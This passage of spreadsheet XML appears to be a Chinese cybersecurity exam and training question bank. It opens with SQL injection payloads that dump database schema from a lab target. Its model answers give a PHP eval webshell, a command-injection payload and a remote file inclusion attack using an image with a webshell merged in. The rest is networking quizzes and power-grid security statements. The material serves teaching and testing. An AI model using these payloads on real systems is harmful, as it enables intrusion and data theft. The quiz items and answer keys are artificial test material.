字符型 1' and '1'='1 1' and '1'='2 时间盲注 1' and sleep(5)--+
3.查列名
order by
4.联合查询
union select (列数填充满，)group_concat(table_schema,table_name) from information_schema.tables
查字段名
union select (列数填充满，)group_concat(columu_name) from information_schema.columns
5.直接查得数据
获取库名
/Less-1/?id=-1'+union+select+222,GROUP_CONCAT(DISTINCT+table_schema+SEPARATOR+',+'),4444+AS+concatenated_schemas+FROM+information_schema.columns%3b--+
获取特定库的表名
/Less-1/?id=-1' union select 222,GROUP_CONCAT(DISTINCT table_name SEPARATOR ', '),4444 AS concatenated_schemas FROM information_schema.columns where table_schema='security';-- 
获取特定库的特定表的字段名
-1' union select 222,GROUP_CONCAT(DISTINCT column_name SEPARATOR ', '),4444 AS concatenated_schemas FROM information_schema.columns where table_schema='security' and table_name='users';-- </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>简述一句话木马的原理以及shell连接工具？并给出文件上传的思路。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>简述命令执行的漏洞原理，给出攻击场景以及执行命令漏洞的思路和payload。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>遇到文件包含场景漏洞题目，如何进行远程文件包含攻击？阐述攻击过程及原因。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>一句话木马本身是个程序，利用eval断言函数远程执行代码。
如 &lt;?php eval($_POST[‘cmd’]);?&gt;
服务端接受post型传参cmd的参数，当作代码字符串运行。在此过程中，我们会使用system(‘ls’)这类系统命令来执行对应的危险操作。
比如上传图片处，我们将后门代码伪装作图片，绕过前端js的限制和后端的文件头、MIME类型检测、图像检查，然后找到上传的后门位置，使用shell工具连接即可。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>是由于服务器执行命令但是过滤不严谨，攻击场景可举例靶场环境中的 ping ip 的问题，网站本身希望留存探活功能，输入ip然后ping，但实际payload 诸如  ping 127.0.0.256 || ifconfig 可以绕过服务器的原本本意的ping命令，执行自己的ifconfig等自己的系统命令。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文件包含不需要考虑被包含的文件名的后缀，只需要文件中存在正常完整的php代码即可。
构建有后门的1.php（手动传参的一句话后门）和正常的不大的图片1.jpg，使用windows命令 copy 1.jpg /b + 1.php /t muma.jpg，这样可以生成正常图片显示但是包含后门的muma.jpg图片，但是又可以绕过服务器的后端检测。
本地利用phpstudy搭建网站，根目录下放置muma.jpg
寻找目标系统的文件包含点，传参远程包含我们的 http://ip:port/muma.jpg
对此url进行手动传参，执行自己构建的系统命令，如cmd=system(‘ifconfig’);。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>阳泉国网培训网络安全</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网络安全基础培训</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2023阳泉国网考试试卷</t>
  </si>
  <si>
    <t>2023阳泉国网考试试卷</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>梆梆安全</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>永信</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>绿盟</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>奇安信</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>中北大学711实验室</t>
  </si>
  <si>
    <t>中北大学711实验室</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>山东大学</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>清华大学</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>申晏键</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>选择题选项配置</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>西欧|亚洲|美国|东欧</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网络安全测试</t>
  </si>
  <si>
    <t>安全监测</t>
  </si>
  <si>
    <t>软件工程</t>
  </si>
  <si>
    <t>软件测试</t>
  </si>
  <si>
    <t>SDL</t>
  </si>
  <si>
    <t>主机安全</t>
  </si>
  <si>
    <t>5G阶段，基于5G网元（）的分流能力，5G网络天然支持移动CDN节点的下沉和灵活部署</t>
  </si>
  <si>
    <t>以下哪些是HTML5引入的新标签？</t>
  </si>
  <si>
    <t>下列哪个选项是IDS和IPS的区别</t>
  </si>
  <si>
    <t>计算机的威胁包括了什么</t>
  </si>
  <si>
    <t>某日小丁的手机收到了一条告知网银需要升级的短信，小丁该怎么做</t>
  </si>
  <si>
    <t>你在逛商场时发现手机没有流量，正好看到WiFi列表里有一个某咖啡店的公共WiFi，你会</t>
  </si>
  <si>
    <t>对于WireShark筛选器中输入 http or ftp 说法正确的是（    ）。</t>
  </si>
  <si>
    <t>对于WireShark筛选器中输入 ip.addr == 192.168.0.1 描述错误的是（   ）。</t>
  </si>
  <si>
    <t>以下属于网络中的端点的是（   ）。</t>
  </si>
  <si>
    <t>WireShark中下列哪些功能不能讲主机之间的连接显示出来。（   ）</t>
  </si>
  <si>
    <t>下面关于 ARP 协议的描述中，错误的是（   ）。</t>
  </si>
  <si>
    <t>以太网传送的帧长度可能为（）字节。</t>
  </si>
  <si>
    <t>若子网掩码为255.255.255.192，下列IP地址不属于同一个子网的有（   ）。</t>
  </si>
  <si>
    <t>关于MTU值，下列说法正确的是（   ）。</t>
  </si>
  <si>
    <t>以下哪些端口不可以由操作系统任意使用？（   ）</t>
  </si>
  <si>
    <t>下列关于TCP和UDP的共同特征错误的是（   ）。</t>
  </si>
  <si>
    <t>以下关于 TCP与UDP描述正确的是（   ）。</t>
  </si>
  <si>
    <t>当一些设备互连时，需要使用直连线的有（   ）。</t>
  </si>
  <si>
    <t>以下TCP段的标志在“三次握手”中发挥作用的是（   ）。</t>
  </si>
  <si>
    <t>如果一个数据包的Len=0，则以下说法错误的是（   ）。</t>
  </si>
  <si>
    <t>TCP滑动窗口机制的作用有哪些（   ）。</t>
  </si>
  <si>
    <t>如果SACK后面的值为100-200，则下列说法错误的是（   ）。</t>
  </si>
  <si>
    <t>ICMP数据包里控制消息里面包含哪些信息（   ）。</t>
  </si>
  <si>
    <t>下列属于利用icmp协议进行网络攻击的有（   ）。</t>
  </si>
  <si>
    <t>下列关于路由追踪说法正确的是（   ）。</t>
  </si>
  <si>
    <t>以下哪些选项属于DHCP的工作过程？（   ）</t>
  </si>
  <si>
    <t>在DHCP Discover中，下列说法正确的是（   ）。</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF333333"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下列关于</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF333333"/>
        <rFont val="Helvetica"/>
        <family val="2"/>
      </rPr>
      <t>DNS</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF333333"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>协议说法正确的是（</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF333333"/>
        <rFont val="Helvetica"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF333333"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）。</t>
    </r>
  </si>
  <si>
    <t>以下哪些选项是HTTP传送数据包的方法？（   ）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF333333"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>在</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF333333"/>
        <rFont val="Helvetica"/>
        <family val="2"/>
      </rPr>
      <t>SSL</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF333333"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>握手过程中，</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF333333"/>
        <rFont val="Helvetica"/>
        <family val="2"/>
      </rPr>
      <t>Server Hello</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF333333"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数据包里的</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF333333"/>
        <rFont val="Helvetica"/>
        <family val="2"/>
      </rPr>
      <t>CipherSuite</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF333333"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>包含（</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF333333"/>
        <rFont val="Helvetica"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF333333"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）。</t>
    </r>
  </si>
  <si>
    <t>关于FTP协议，下列说法正确是的（   ）。</t>
  </si>
  <si>
    <t>CIFS协议中，Session Setup的主要任务是进行身份的验证，常用的方式有（   ）。</t>
  </si>
  <si>
    <t>以下哪些协议与电子邮件协议有关？（   ）</t>
  </si>
  <si>
    <t>IP地址由哪几部分组成（   ）。</t>
  </si>
  <si>
    <t>802.11管理帧的头部包含哪些信息（   ）。</t>
  </si>
  <si>
    <t>用来监听网络线路的方法有（   ）。</t>
  </si>
  <si>
    <t>下列关于回溯分析技术在网络安全中领域的应用，正确的是（   ）。</t>
  </si>
  <si>
    <t>流量突发可能会造成的影响有（   ）。</t>
  </si>
  <si>
    <t>下列属于蠕虫传播途径的有（   ）。</t>
  </si>
  <si>
    <t>下列属于蠕虫病毒的有（   ）。</t>
  </si>
  <si>
    <t>僵尸网络的使用的域名特征有（   ）。</t>
  </si>
  <si>
    <t>DNS放大攻击中受害端的特征可能有（   ）。</t>
  </si>
  <si>
    <t>以下哪些选项的内容会产生告警信息？（   ）</t>
  </si>
  <si>
    <t>常见对网站的web攻击有（   ）。</t>
  </si>
  <si>
    <t>常见告警日志分析的思路包括（   ）。</t>
  </si>
  <si>
    <t>针对内网的攻击可能导致（   ）。</t>
  </si>
  <si>
    <t>AC</t>
  </si>
  <si>
    <t>CD</t>
  </si>
  <si>
    <t>ABCDE</t>
  </si>
  <si>
    <t>A|CGW|RRU|UPF</t>
  </si>
  <si>
    <t>video|audio|canvas|command</t>
  </si>
  <si>
    <t>串联与并联|可旁路部署|具备防病毒功能|属于流量层面的安全设备</t>
  </si>
  <si>
    <t>内部人员与外部人员勾结|内部权限滥用|身份认证|天灾</t>
  </si>
  <si>
    <t>马上按照短信要求进行升级|点击短信中的的链接先看一|拨打银行官方电话进行核实|上网搜索了一下号码无误，于是再点短信链接进行升级。</t>
  </si>
  <si>
    <t>连接|不连接</t>
  </si>
  <si>
    <t>可以列出 http 协议的数据包|可以列出 ftp 协议的数据包|列出 http 或 ftp  协议的数据包|将 http 和 ftp  协议的数据包排除</t>
  </si>
  <si>
    <t>筛选出目的IP地址为 192.168.0.1 的数据包|筛选出源IP地址为 192.168.0.1 的数据包|筛选出所有IP地址不是 192.168.0.1 的数据包|筛选出所有IP地址为 192.168.0.1 的数据包</t>
  </si>
  <si>
    <t>180.97.125.228|192.168.2.128|fe80::ac43:f625:ab08:3e68|2001:0DB8:0000:0000:0000:0000:1428:0000</t>
  </si>
  <si>
    <t>IO Graphs|Round Trip Time Graph|Flow Graph|Expert info</t>
  </si>
  <si>
    <t>ARP协议根据IP地址获取对应的MAC地址|ARP报文封装在IP数据报中传送|ARP请求采用单播方式，应答使用广播方式|ARP协议是一种路由协议</t>
  </si>
  <si>
    <t>1800|64|1480|256</t>
  </si>
  <si>
    <t>156.26.27.71和156.26.101.110|156.26.101.88和156.26.101.132|156.26.27.71和156.26.27.110|156.26.27.7和156.27.101.132</t>
  </si>
  <si>
    <t>MTU的大小会影响传输的报文的分片|MTU的存在会增加数据丢包的可能性|MTU的存在会降低数据传输的性能|</t>
  </si>
  <si>
    <t>80|21|1122|4444</t>
  </si>
  <si>
    <t>都是网络层协议|都是面向连接的协议|都提供可靠性|都使用端口号</t>
  </si>
  <si>
    <t>TCP在传输之前需要先建立连接|UDP是面向连接的协议|TCP有流量控制|UDP会针对乱序的消息进行重排</t>
  </si>
  <si>
    <t>交换机和路由器连接|交换机与交换机之间通过UPLINKS口连接|两台PC网卡与网卡之间的连接|计算机与交换机连接</t>
  </si>
  <si>
    <t>SYN|ACK|URG|RST</t>
  </si>
  <si>
    <t>这是一个错误的数据包|这是一个无意义的数据包|网络传输出现了故障|Len=0并不能说明什么</t>
  </si>
  <si>
    <t>检测什么时候发生了数据包丢失|调整数据传输速率|利用数据发送方的接收窗口来对数据流进行控制|提供TCP可靠性：对发送的数据进行确认</t>
  </si>
  <si>
    <t>100至200的数据已收到|100至200的数据未收到|100之前的数据已收到|200之后的数据已收到</t>
  </si>
  <si>
    <t>Type|Code|Checksum|Hops</t>
  </si>
  <si>
    <t>SYN Flood攻击|Smurf攻击|死亡之ping|CC攻击</t>
  </si>
  <si>
    <t>windows进行路由追踪可使用 tracert 功能|路由跟踪功能用来识别一个设备到另一个设备的网络路径|Tracert 先发送 TTL 为 0 的回应数据包，并在随后的每次发送过程将 TTL 递增 1，直到目标响应或 TTL 达到最大值，从而确定路由|路由追踪时发送UDP数据报给目标主机</t>
  </si>
  <si>
    <t>DHCP Discover|DHCP offer|DHCP Request|DHCP Listen</t>
  </si>
  <si>
    <t>源地址为 0.0.0.0|源地址为 127.0.0.1|目标地址为255.255.255.255|目标地址为网关地址</t>
  </si>
  <si>
    <t>DNS域名解析的过程中通常会用到两种查询方式，分别是递归查询和迭代查询|DNS是基于TCP协议的|53号端口是系统默认的DNS查询的端口|DNS协议可以将IP转换为域名</t>
  </si>
  <si>
    <t>GET|POST|HEAD|PUT</t>
  </si>
  <si>
    <t>验证证书加密算法|数据加密算法|校验消息算法|解密算法</t>
  </si>
  <si>
    <t>FTP服务一般运行在20和21两个端口|传输大量的小文件时效率比较低|数据连接在传输完成时断开|传输新文件需要重新建立连接</t>
  </si>
  <si>
    <t>DHCP|ICMP|NTLM|Kerberos</t>
  </si>
  <si>
    <t>HTTP|IMAP|POP|SMTP</t>
  </si>
  <si>
    <t>子网掩码|网络地址|默认网关|主机地址</t>
  </si>
  <si>
    <t>数据包的时间戳|数据包的重传间隔|硬件容量信息|WAP广播的SSID</t>
  </si>
  <si>
    <t>端口镜像|ARP欺骗|集线器输出|使用网络分流器</t>
  </si>
  <si>
    <t>提供了透视网络行为和时间追溯的重要手段|发现并追踪定位可疑通信行为|各类安全设备警报事件分析验证|恶意样本网络行为特征分析</t>
  </si>
  <si>
    <t>导致网络拥塞|产生丢包、延时，网络质量下降|早造成网络无法提供正常服务|</t>
  </si>
  <si>
    <t>电子邮件|即时通用漏洞|操作系统漏洞|应用网络漏洞</t>
  </si>
  <si>
    <t>熊猫烧香|“求职信”病毒|灰鸽子|震网病毒</t>
  </si>
  <si>
    <t>动态域名|成本低廉|管理不严格|</t>
  </si>
  <si>
    <t>DNS流量占比极高|DNS流量比平均包长超过1000B|大量TYPE=255的应答报文|可能出现大量IP分片报文</t>
  </si>
  <si>
    <t>远程命令执行|网站后台探测|一句话木马连接|80端口隐蔽通道传输</t>
  </si>
  <si>
    <t>sql注入|webshell上传|永恒之蓝|命令执行</t>
  </si>
  <si>
    <t>基于IP的分析|基于时间的分析|基于资产的分析|基于告警的分析</t>
  </si>
  <si>
    <t>数据泄漏|网络不稳定|沦为僵尸主机|感染病毒</t>
  </si>
  <si>
    <t>CDN技术及应用</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>山西移动2021考试题库</t>
  </si>
  <si>
    <t>山西移动2021考试题库</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>陈新</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>电力专用纵向加密认证装置在密钥和各类证书安装之前，电力专用纵向加密认证装置处于初始状态，在初始状态下，装置只能进行设备密钥和各类证书的安装。在设备密钥和各类证书安装之后，装置才能进入正常工作状态，装置的状态迁移不能逆转。</t>
  </si>
  <si>
    <t>电力专用纵向加密认证装置之间安全通信所采用的加密算法、工作方式和通信协议等在协商之前已经确定，无须协商。</t>
  </si>
  <si>
    <t>电力专用纵向加密认证装置会话密钥为非对称密钥，用于电力专用纵向加密认证装置之间的通信加密，会话密钥由设备在建立连接时动态协商产生，拆除连接时失效。</t>
  </si>
  <si>
    <t>电力专用纵向加密认证装置应支持旁路功能，在紧急故障状态下，可以旁路所有安全功能，作为透明桥接设备工作。</t>
  </si>
  <si>
    <t>电力专用纵向加密认证装置安置在电力控制系统的内部局域网与电力调度数据网络的路由器之间，用来保障电力调度系统纵向数据传输过程中的数据机密性、完整性和真实性。</t>
  </si>
  <si>
    <t>电力专用纵向加密认证装置隧道建立成功后，如果两端网络通信一直保持正常，隧道不需要重新建立。</t>
  </si>
  <si>
    <t>电力调度数字证书系统支持的非对称算法有RSA和DSA算法。</t>
  </si>
  <si>
    <t>电力调度数字证书系统中签发员的职责权限可以拒绝不符合要求的证书撤销申请。</t>
  </si>
  <si>
    <t>电力调度数字证书系统采用分级部署，国调是1级CA,省调是2级CA，地调是3级CA。</t>
  </si>
  <si>
    <t>电力调度数字证书系统不能签发人员证书。</t>
  </si>
  <si>
    <t>电力调度数字证书系统的管理员、操作员等角色应由同一个人负责。</t>
  </si>
  <si>
    <t>一个调度数字证书对应一个公钥一个私钥。</t>
  </si>
  <si>
    <t>电力调度数字证书可以用于验签。</t>
  </si>
  <si>
    <t>调度数字证书的签名算法属性是1.2.156.10197.1.501，说明此证书是RSA算法的证书。</t>
  </si>
  <si>
    <t>电力调度数字证书系统为设备颁发的设备证书都拥有相同的公钥。</t>
  </si>
  <si>
    <t>电力调度数字证书系统具备数据库备份与恢复功能。</t>
  </si>
  <si>
    <t>电力调度数字证书系统必须以离线方式部署于国产安全Li错ux操作系统中，单机离线模式部署，以本机模式访问，并不得以任何方式接入任何网络。</t>
  </si>
  <si>
    <t>电力监控系统内网安全监视平台可以采集服务器告警日志信息。</t>
  </si>
  <si>
    <t>电力监控系统内网安全监视平台I/II区采集工作站需要安装加密卡。</t>
  </si>
  <si>
    <t>电力监控系统内网安全监视平台的日志格式中告警时间不包含秒。</t>
  </si>
  <si>
    <t>电力监控系统内网安全监视平台中防火墙设备包含管理日志、系统日志和安全日志。</t>
  </si>
  <si>
    <t>电力监控系统内网安全监视平台可以远程对防火墙进行配置管理。</t>
  </si>
  <si>
    <t>电力监控系统内网安全监视平台纵向管控功能，纵向拓扑图中以绿线表示两台纵向装置隧道建立成功。</t>
  </si>
  <si>
    <t>电力监控系统内网安全监视平台可以实现远程对纵向装置程序进行升级。</t>
  </si>
  <si>
    <t>电力监控系统内网安全监视平台接入防火墙设备时，需部署与之对应的日志解析库，用以将日志格式进行转换。</t>
  </si>
  <si>
    <t>电力监控系统内网安全监管平台的监视范围进一步扩展至变电站与电厂，并将监视内容扩展至网络设备、主机设备。</t>
  </si>
  <si>
    <t>电力监控系统内网安全监管平台的数据采集功能：使用多种采集手段，对部署于电力监控系统中的主机设备、网络设备、安全设备的运行信息、告警信息、配置信息进行采集。</t>
  </si>
  <si>
    <t>电力系统控制类软件应依据IP地址、子网掩码等属性对连接服务器的客户端工作站进行限制。</t>
  </si>
  <si>
    <t>《国家电网应用软件通用安全要求》中规定，应用系统审计记录的内容至少应包括事件的日期、时间、发起者信息、类型、描述和结果等。</t>
  </si>
  <si>
    <t>《国家电网应用软件通用安全要求》中规定，应用系统应该提供数据完整性检验功能，保证通过人机接口输入或通过通信接口输入的数据格式或长度符合系统设定要求</t>
  </si>
  <si>
    <t>D5000安全认证模块的认证过程采用的是双向加密算法。</t>
  </si>
  <si>
    <t>D5000安全认证模块的双因子认证中的双因子为证书和密码。</t>
  </si>
  <si>
    <t>D5000安全认证模块的人员登陆信息验证是在服务器中实现的。</t>
  </si>
  <si>
    <t>D5000安全认证模块电子钥匙密码输入错误超过一定次数后将被锁定。</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>如果D5000安全认证模块的</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>证书系统证书部署错误，D5000安全认证模块将无法通过验证。</t>
    </r>
  </si>
  <si>
    <t>当证书系统证书更新后，原D5000安全认证模块的所有人员证书、程序证书及安全标签均需要重新签发。</t>
  </si>
  <si>
    <t>目前D5000安全认证模块可以部署在wi错dows操作系统上。</t>
  </si>
  <si>
    <t>D5000安全认证模块中电子钥匙的密码无法更改。</t>
  </si>
  <si>
    <t>可以使用省调的证书系统签发所辖地调的D5000安全认证模块人员证书。</t>
  </si>
  <si>
    <t>当使用D5000安全认证模块的电子钥匙登陆成功后，进行安全遥控操作时可以不插入电子钥匙。</t>
  </si>
  <si>
    <t>对影响到可信密码模块驱动的变量必须进行重新配置</t>
  </si>
  <si>
    <t>每个虚拟的TPCM使用单独的物理TPCM功能</t>
  </si>
  <si>
    <t>电力调度控制系统中，可信平台控制模块是可信计算的核心</t>
  </si>
  <si>
    <t>电力调度控制系统可信计算安全模块的完整性度量功能是将度量值信息与预生成的可信基准信息比对，以验证业务系统中对象的可信属性</t>
  </si>
  <si>
    <t>受可信计算保护的环境中可以对二进制代码进行修改和删除</t>
  </si>
  <si>
    <t>受可信计算保护的环境仅能通过可信计算安全模块的配置工具进行程序的安装和更新</t>
  </si>
  <si>
    <t>可信密码模块的密码算法引擎由于PCI机制仅能在操作系统启动后才能挂载执行</t>
  </si>
  <si>
    <t>可信计算安全模块仅能进行全盘的策略扫描和更新</t>
  </si>
  <si>
    <t>可信计算保护功能可以被卸载和旁路</t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全监测装置技术规范（试行）》要求，通用采集信息格式在“行为”字段中定义了产生或上传该事件的设备类型，其中网络安全监测装置的设备类型值是DCD</t>
  </si>
  <si>
    <t>《电力监控系统网络安全管理平台基础支撑功能规范（试行）》、《电力监控系统网络安全管理平台应用功能规范（试行）》适用于电力监控系统网络安全管理平台的研发、建设、验收。</t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全管理平台应用功能规范（试行）》规定，电力监控系统网络安全管理平台的安全监视功能提供对电力监控系统整体安全运行情况进行实时监视的功能，包括安全概览、拓扑监视、设备监视、行为监视、流量监视、纵向管控、响应处置等。</t>
  </si>
  <si>
    <t>《国家电网公司关于加快推进电力监控系统网络安全管理平台建设的通知》中电力监控系统安全管理平台的建设原则为：继承现有防护优势、创新发展监控技术、建设先进实用功能。</t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全监测装置技术规范（试行）》要求，厂站的服务器和工作站“开放非法端口”的事件级别是紧急</t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全监测装置技术规范（试行）》要求，网络安全监测装置将收到的时间戳与自身时间对比，如果误差超过30s则拒绝执行。</t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全管理平台应用功能规范（试行）》规定，综合审计以被监测设备为对象，从威胁事件关联到其他所涉及的操作及告警的整体情况，进一步细化到具体的各条安全事件和告警，还原威胁发生的全过程。</t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全监测装置技术规范（试行）》要求，I型网络安全监测装置采集对象中，数据库可以直接原文上传</t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全管理平台应用功能规范（试行）》规定，电力监控系统网络安全管理平台的威胁监视功能可实时监视使用SSH协议或X11协议从初始节点到活跃节点经过的访问路径、当前访问的用户、操作指令、操作时间等</t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全监测装置技术规范（试行）》规定，主站服务器、工作站等设备采集信息包括登录操作信息、基线核查信息、配置信息、硬件信息、告警信息</t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全监测装置技术规范（试行）》规定，网络安全监测装置通过服务代理方式为主站网络安全管理平台提供服务调用，服务代理采用的传输层协议是UDP、默认端口号8801。</t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全监测装置技术规范（试行）》规定，网络安全监测装置提供服务代理方式，服务端及客户端均是网络安全监测装置。</t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全监测装置技术规范（试行）》要求，I型网络安全监测装置具备上传事件功能，网络设备上传事件中温度异常属于紧急事件。</t>
  </si>
  <si>
    <t>根据电力监控系统网络安全监测装置技术规范（试行）规定，网络安全监测装置（II型）仅可通过NTP方式对时</t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全监测装置技术规范（试行）》要求，II型网络安全监测装置具备上传事件功能，网络设备的交换机上线上传事件模式采用了归并。</t>
  </si>
  <si>
    <t xml:space="preserve">根据《电力监控系统网络安全监测装置技术规范（试行）》规定，网络安全监测装置分为I型和II型，I型和II型都用在主站，厂站仅使用II型                         </t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全监测装置技术规范（试行）》要求，厂站交换机MAC地址绑定关系变更时，II型网络安全监测装置上传相关事件，其中MAC地址字段6个字节</t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全监测装置技术规范（试行）》要求，厂站交换机修改用户名密码时，II型网络安全监测装置上传相关事件，此事件的级别是重要告警</t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全监测装置技术规范（试行）》要求，I型网络安全监测装置的电源应满足双路交直流。</t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全监测装置技术规范（试行）》要求，I型网络安全监测采集服务器、工作站的有关信息，其中链路活跃信息的默认采集周期是60秒</t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全监测装置技术规范（试行）》要求，I型网络安全监测采集网络设备的在线状态时，使用了SYSLOG协议</t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全监测装置技术规范（试行）》要求，网络安全监测装置与管理平台通信规范中，事件上传采用了DL/T634.5104协议</t>
  </si>
  <si>
    <t>根据电力监控系统网络安全监测装置技术规范（试行）规定，网络安全监测装置与网络安全管理平台通信报文是明文传输的</t>
  </si>
  <si>
    <t>根据电力监控系统网络安全监测装置技术规范（试行）要求，装置上电后对时服务状态异常时对时告警灯会处于闪烁状态</t>
  </si>
  <si>
    <t>根据电力监控系统网络安全监测装置技术规范（试行）规定，网络安全监测装置在没有外部时钟源校正时，24 小时守时误差应不超过3s</t>
  </si>
  <si>
    <t>根据电力监控系统网络安全监测装置技术规范（试行）规定，I型网络安全监测装置对网络设备上传事件模式是实时模式。</t>
  </si>
  <si>
    <t>根据电力监控系统网络安全监测装置技术规范（试行）规定，网络安全监测装置与平台建立通信过程包括隧道协商过程。</t>
  </si>
  <si>
    <t>根据电力监控系统网络安全监测装置技术规范（试行）规定，网络安全监测装置与服务器、工作站设备通信报文类型的定义，0x1是采集信息上报功能类型。</t>
  </si>
  <si>
    <t>根据《电力监控系统网络安全监测装置技术规范（试行）》要求，网络安全监测装置针对安全防护设备采集开放的默认服务端口是TCP 8800</t>
  </si>
  <si>
    <t>根据国家电网调〔2017〕1084号文件，电力监控系统网络安全管理平台的告警级别包括紧急、一般、普通三种。</t>
  </si>
  <si>
    <t>根据国家电网调〔2017〕1084号文件，网络安全管理平台主站端的监视对象，包括服务器、工作站、网络设备、安防设备及数据库。</t>
  </si>
  <si>
    <t>根据国家电网调〔2017〕1084号文件，厂站网络安全监测装置分别通过实时VPN和非实时VPN与主站平台进行通信。</t>
  </si>
  <si>
    <t>根据国家电网调〔2017〕1084号文件，厂站网络安全监测装置的基本连接方式为一端连接内网交换机，另一端连接调度数据网交换机。</t>
  </si>
  <si>
    <t>根据国家电网调〔2017〕1084号文件，网络安全管理平台支持设备白名单监视功能。</t>
  </si>
  <si>
    <t>根据国家电网调〔2017〕1084号文件，Ⅱ型网络安全监测装置大小是2U。</t>
  </si>
  <si>
    <t>根据国家电网调〔2017〕1084号文件，Ⅰ型网络安全监测装置大小是1U。</t>
  </si>
  <si>
    <t>根据国家电网调〔2017〕1084号文件，Ⅰ型网络安全监测装置支持UI界面显示。</t>
  </si>
  <si>
    <t>根据国家电网调〔2017〕1084号文件，网络安全管理平台安全监视功能，支持对CPU利用率和内存利用率进行监视。</t>
  </si>
  <si>
    <t>根据国家电网调〔2017〕1084号文件，网络安全管理平台安全监视功能，不支持对防火墙设备实时监视在线状态。</t>
  </si>
  <si>
    <t>根据国家电网调〔2017〕1084号文件，网络安全管理平台安全告警功能，提供一年内的安全告警信息的记录、查询等功能。</t>
  </si>
  <si>
    <t>根据国家电网调〔2017〕1084号文件，网络安全管理平台安全告警功能提供报表工具，可生成用户所需的安全运行报表。</t>
  </si>
  <si>
    <t>根据国家电网调〔2017〕1084号文件，网络安全管理平台安全监视功能支持为安全事件分析提供追溯手段。</t>
  </si>
  <si>
    <t>根据国家电网调〔2017〕1084号文件，网络安全管理平台服务管理功能，支持提供基于消息通信的消息总线功能，实现基于事件的实时消息发布、订阅功能。</t>
  </si>
  <si>
